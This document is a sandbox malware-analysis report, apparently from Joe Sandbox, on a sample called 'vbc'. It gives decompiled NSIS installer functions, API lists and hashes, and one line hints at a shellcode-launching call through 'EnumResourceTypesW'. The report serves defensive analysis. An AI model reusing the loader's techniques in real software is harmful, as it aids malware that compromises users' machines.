                                                • Opcode ID: fbc8e3c7f51d7818c3e9ebe12f5ecc36ed6e5fe01e7d03bf71c6e79a5fdedc58
                                                • Instruction ID: 8ad9bd603bb4c2cb2292177aa9721f3da77c144169ebace510bf6b741a112718
                                                • Opcode Fuzzy Hash: fbc8e3c7f51d7818c3e9ebe12f5ecc36ed6e5fe01e7d03bf71c6e79a5fdedc58
                                                • Instruction Fuzzy Hash: 76C08C33700004CBC700CBA8FA8448CB7B1EB4032972184B7C203E1070D77189A29B28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403402(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}




                                                0x00403410
                                                0x00403416

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040430B(int _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SendMessageW( *0x42a248, 0x28, _a4, 1); // executed
                                                				return _t2;
                                                			}




                                                0x00404319
                                                0x0040431f

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E1000121B() {
                                                				void* _t3;
                                                
                                                				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
                                                				return _t3;
                                                			}




                                                0x10001225
                                                0x1000122b

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E004054B0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t94;
                                                				long _t95;
                                                				int _t100;
                                                				void* _t108;
                                                				intOrPtr _t130;
                                                				struct HWND__* _t134;
                                                				int _t156;
                                                				int _t159;
                                                				struct HMENU__* _t164;
                                                				struct HWND__* _t168;
                                                				struct HWND__* _t169;
                                                				int _t171;
                                                				void* _t172;
                                                				short* _t173;
                                                				short* _t175;
                                                				int _t177;
                                                
                                                				_t169 =  *0x429224;
                                                				_t156 = 0;
                                                				_v8 = _t169;
                                                				if(_a8 != 0x110) {
                                                					if(_a8 == 0x405) {
                                                						CloseHandle(CreateThread(0, 0, E00405444, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                					}
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						_t171 = 1;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t94 = _v8;
                                                							if(_a12 != _t94) {
                                                								goto L20;
                                                							}
                                                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                							_a8 = _t95;
                                                							if(_t95 <= _t156) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t164 = CreatePopupMenu();
                                                							AppendMenuW(_t164, _t156, _t171, E00406234(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                							_t100 = _a16;
                                                							_t159 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v28);
                                                								_t100 = _v28.left;
                                                								_t159 = _v28.top;
                                                							}
                                                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                								_v60 = _t156;
                                                								_v48 = 0x423728;
                                                								_v44 = 0x1000;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                								} while (_a4 != _t156);
                                                								OpenClipboard(_t156);
                                                								EmptyClipboard();
                                                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                								_a4 = _t108;
                                                								_t172 = GlobalLock(_t108);
                                                								do {
                                                									_v48 = _t172;
                                                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                									 *_t173 = 0xd;
                                                									_t175 = _t173 + 2;
                                                									 *_t175 = 0xa;
                                                									_t172 = _t175 + 2;
                                                									_t156 = _t156 + 1;
                                                								} while (_t156 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(0xd, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						if( *0x42920c == _t156) {
                                                							ShowWindow( *0x42a248, 8);
                                                							if( *0x42a2cc == _t156) {
                                                								E00405371( *((intOrPtr*)( *0x422700 + 0x34)), _t156);
                                                							}
                                                							E004042AF(_t171);
                                                							goto L25;
                                                						}
                                                						 *0x421ef8 = 2;
                                                						E004042AF(0x78);
                                                						goto L20;
                                                					} else {
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E0040433D(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x429210, _t156);
                                                						ShowWindow(_t169, 8);
                                                						E0040430B(_t169);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_t177 = 2;
                                                				_v60 = _t177;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t130 =  *0x42a250;
                                                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                				 *0x429210 = GetDlgItem(_a4, 0x403);
                                                				 *0x429208 = GetDlgItem(_a4, 0x3ee);
                                                				_t134 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x429224 = _t134;
                                                				_v8 = _t134;
                                                				E0040430B( *0x429210);
                                                				 *0x429214 = E00404C0E(4);
                                                				 *0x42922c = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                				if(_a8 >= 0) {
                                                					SendMessageW(_v8, 0x1001, 0, _a8);
                                                					SendMessageW(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t156) {
                                                					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E004042D6(_a4);
                                                				if(( *0x42a258 & 0x00000003) != 0) {
                                                					ShowWindow( *0x429210, _t156);
                                                					if(( *0x42a258 & 0x00000002) != 0) {
                                                						 *0x429210 = _t156;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E0040430B( *0x429208);
                                                				}
                                                				_t168 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                				if(( *0x42a258 & 0x00000004) != 0) {
                                                					SendMessageW(_t168, 0x409, _t156, _a12);
                                                					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                				}
                                                				goto L36;
                                                			}

































                                                0x004054b8
                                                0x004054be
                                                0x004054c8
                                                0x004054cb
                                                0x00405661
                                                0x00405685
                                                0x00405685
                                                0x00405698
                                                0x004056b6
                                                0x004056b8
                                                0x004056c0
                                                0x00405716
                                                0x0040571a
                                                0x00000000
                                                0x00000000
                                                0x0040571c
                                                0x00405722
                                                0x00000000
                                                0x00000000
                                                0x0040572c
                                                0x00405734
                                                0x00405737
                                                0x00405839
                                                0x00000000
                                                0x00405839
                                                0x00405746
                                                0x00405751
                                                0x0040575a
                                                0x00405765
                                                0x00405768
                                                0x00405771
                                                0x00405777
                                                0x0040577a
                                                0x0040577a
                                                0x00405792
                                                0x0040579b
                                                0x0040579e
                                                0x004057a5
                                                0x004057ac
                                                0x004057b4
                                                0x004057b4
                                                0x004057cb
                                                0x004057cb
                                                0x004057d2
                                                0x004057d8
                                                0x004057e4
                                                0x004057eb
                                                0x004057f4
                                                0x004057f6
                                                0x004057f9
                                                0x00405808
                                                0x0040580b
                                                0x00405811
                                                0x00405812
                                                0x00405818
                                                0x00405819
                                                0x0040581a
                                                0x00405822
                                                0x0040582d
                                                0x00405833
                                                0x00405833
                                                0x00000000
                                                0x00405792
                                                0x004056c8
                                                0x004056f8
                                                0x00405700
                                                0x0040570b
                                                0x0040570b
                                                0x00405711
                                                0x00000000
                                                0x00405711
                                                0x004056cc
                                                0x004056d6
                                                0x00000000
                                                0x0040569a
                                                0x004056a0
                                                0x004056db
                                                0x00000000
                                                0x004056e4
                                                0x004056a9
                                                0x004056ae
                                                0x004056b1
                                                0x00000000
                                                0x004056b1
                                                0x00405698
                                                0x004054d1
                                                0x004054d5
                                                0x004054dd
                                                0x004054e1
                                                0x004054e4
                                                0x004054e7
                                                0x004054ea
                                                0x004054ed
                                                0x004054ee
                                                0x004054ef
                                                0x00405508
                                                0x0040550b
                                                0x00405515
                                                0x00405524
                                                0x0040552c
                                                0x00405534
                                                0x00405539
                                                0x0040553c
                                                0x00405548
                                                0x00405551
                                                0x0040555a
                                                0x0040557c
                                                0x00405582
                                                0x00405593
                                                0x00405598
                                                0x004055a6
                                                0x004055b4
                                                0x004055b4
                                                0x004055b9
                                                0x004055c7
                                                0x004055c7
                                                0x004055cc
                                                0x004055cf
                                                0x004055d4
                                                0x004055e0
                                                0x004055e9
                                                0x004055f6
                                                0x00405605
                                                0x004055f8
                                                0x004055fd
                                                0x004055fd
                                                0x00405611
                                                0x00405611
                                                0x00405625
                                                0x0040562e
                                                0x00405637
                                                0x00405647
                                                0x00405653
                                                0x00405653
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040550E
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040551D
                                                • GetClientRect.USER32 ref: 0040555A
                                                • GetSystemMetrics.USER32 ref: 00405561
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
                                                • ShowWindow.USER32(00000000,?), ref: 004055E9
                                                • ShowWindow.USER32(?,00000008), ref: 004055FD
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040561E
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040552C
                                                  • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405670
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005444,00000000), ref: 0040567E
                                                • CloseHandle.KERNEL32(00000000), ref: 00405685
                                                • ShowWindow.USER32(00000000), ref: 004056A9
                                                • ShowWindow.USER32(?,00000008), ref: 004056AE
                                                • ShowWindow.USER32(00000008), ref: 004056F8
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
                                                • CreatePopupMenu.USER32 ref: 0040573D
                                                • AppendMenuW.USER32 ref: 00405751
                                                • GetWindowRect.USER32(?,?), ref: 00405771
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
                                                • OpenClipboard.USER32(00000000), ref: 004057D2
                                                • EmptyClipboard.USER32 ref: 004057D8
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
                                                • GlobalLock.KERNEL32 ref: 004057EE
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405822
                                                • SetClipboardData.USER32 ref: 0040582D
                                                • CloseClipboard.USER32 ref: 00405833
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: (7B${
                                                • API String ID: 590372296-525222780
                                                • Opcode ID: 4168f7cda2461ab29a413577240e25eb98403622908524b228d767f220b0f951
                                                • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
                                                • Opcode Fuzzy Hash: 4168f7cda2461ab29a413577240e25eb98403622908524b228d767f220b0f951
                                                • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00404771(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				WCHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				WCHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				short* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				WCHAR* _t146;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed int* _t160;
                                                				struct HWND__* _t166;
                                                				struct HWND__* _t167;
                                                				int _t169;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x422700;
                                                				_v32 = _t82;
                                                				_t146 = ( *(_t82 + 0x3c) << 0xb) + L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E0040593B(0x3fb, _t146);
                                                					E004064A6(_t146);
                                                				}
                                                				_t167 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E0040593B(0x3fb, _t146);
                                                							if(E00405CCE(_t186, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E00406212(0x4216f8, _t146);
                                                							_t87 = E004065EC(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E00406212(0x4216f8, _t146);
                                                								_t89 = E00405C71(0x4216f8);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 = 0;
                                                								}
                                                								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t169 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x4216f8) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405C12(0x4216f8);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x4216f8) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t169 = 0x400;
                                                								L36:
                                                								_t95 = E00404C0E(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
                                                									E00404BF6(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextW(_a4, _t169, 0x4216e8);
                                                									} else {
                                                										E00404B2D(_t169, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x42a2e4 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E004042F8(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x423718 == _t158) {
                                                									E00404706();
                                                								}
                                                								 *0x423718 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t186 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t167;
                                                							_v72 = 0x423728;
                                                							_v60 = E00404AC7;
                                                							_v56 = _t146;
                                                							_v68 = E00406234(_t146, 0x423728, _t167, 0x421f00, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderW(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E00405BC6(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x42a250 + 0x11c));
                                                								if( *((intOrPtr*)( *0x42a250 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93") {
                                                									E00406234(_t146, 0x423728, _t167, 0, _t125);
                                                									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
                                                										lstrcatW(_t146, 0x4281e0);
                                                									}
                                                								}
                                                								 *0x423718 =  *0x423718 + 1;
                                                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t166 = GetDlgItem(_t167, 0x3fb);
                                                					if(E00405C3D(_t146) != 0 && E00405C71(_t146) == 0) {
                                                						E00405BC6(_t146);
                                                					}
                                                					 *0x429218 = _t167;
                                                					SetWindowTextW(_t166, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E004042D6(_t167);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E004042D6(_t167);
                                                					E0040430B(_t166);
                                                					_t138 = E004065EC(6);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E0040433D(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t166, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}













































                                                0x00404771
                                                0x00404777
                                                0x0040477d
                                                0x0040478a
                                                0x00404798
                                                0x0040479b
                                                0x004047a3
                                                0x004047a9
                                                0x004047a9
                                                0x004047b5
                                                0x004047b8
                                                0x00404826
                                                0x0040482d
                                                0x00404904
                                                0x0040490b
                                                0x0040491a
                                                0x0040491a
                                                0x0040491e
                                                0x00404928
                                                0x00404935
                                                0x00404937
                                                0x00404937
                                                0x00404945
                                                0x0040494c
                                                0x00404953
                                                0x00404956
                                                0x00404992
                                                0x00404994
                                                0x0040499a
                                                0x0040499f
                                                0x004049a3
                                                0x004049a5
                                                0x004049a5
                                                0x004049c1
                                                0x00000000
                                                0x004049c3
                                                0x004049c6
                                                0x004049d4
                                                0x004049da
                                                0x004049db
                                                0x004049de
                                                0x004049e1
                                                0x00000000
                                                0x004049e1
                                                0x00404958
                                                0x0040495a
                                                0x0040495e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404960
                                                0x00404960
                                                0x0040496d
                                                0x00404972
                                                0x00000000
                                                0x00000000
                                                0x00404976
                                                0x00404978
                                                0x00404978
                                                0x00404981
                                                0x00404983
                                                0x00404988
                                                0x0040498b
                                                0x00404990
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404990
                                                0x004049ed
                                                0x004049f7
                                                0x004049fa
                                                0x004049fd
                                                0x00404a04
                                                0x00404a04
                                                0x00404a06
                                                0x00404a06
                                                0x00404a0b
                                                0x00404a0d
                                                0x00404a15
                                                0x00404a1c
                                                0x00404a1e
                                                0x00404a29
                                                0x00404a29
                                                0x00404a1e
                                                0x00404a39
                                                0x00404a43
                                                0x00404a4b
                                                0x00404a66
                                                0x00404a4d
                                                0x00404a56
                                                0x00404a56
                                                0x00404a4b
                                                0x00404a6b
                                                0x00404a70
                                                0x00404a75
                                                0x00404a7e
                                                0x00404a7e
                                                0x00404a87
                                                0x00404a89
                                                0x00404a89
                                                0x00404a95
                                                0x00404a9d
                                                0x00404aa7
                                                0x00404aa7
                                                0x00404aac
                                                0x00000000
                                                0x00404aac
                                                0x00404956
                                                0x0040490d
                                                0x00404914
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404914
                                                0x00404833
                                                0x0040483c
                                                0x00404856
                                                0x0040485b
                                                0x00404865
                                                0x0040486c
                                                0x00404878
                                                0x0040487b
                                                0x0040487e
                                                0x00404885
                                                0x0040488d
                                                0x00404890
                                                0x00404894
                                                0x0040489b
                                                0x004048a3
                                                0x004048fd
                                                0x004048a5
                                                0x004048a6
                                                0x004048ad
                                                0x004048b7
                                                0x004048bf
                                                0x004048cc
                                                0x004048e0
                                                0x004048e4
                                                0x004048e4
                                                0x004048e0
                                                0x004048e9
                                                0x004048f6
                                                0x004048f6
                                                0x004048a3
                                                0x00000000
                                                0x0040485b
                                                0x00404849
                                                0x00000000
                                                0x00000000
                                                0x0040484f
                                                0x00000000
                                                0x004047ba
                                                0x004047c7
                                                0x004047d0
                                                0x004047dd
                                                0x004047dd
                                                0x004047e4
                                                0x004047ea
                                                0x004047f3
                                                0x004047f6
                                                0x004047f9
                                                0x00404801
                                                0x00404804
                                                0x00404807
                                                0x0040480d
                                                0x00404814
                                                0x0040481b
                                                0x00404ab2
                                                0x00404ac4
                                                0x00404821
                                                0x00404824
                                                0x00000000
                                                0x00404824
                                                0x0040481b

                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004047C0
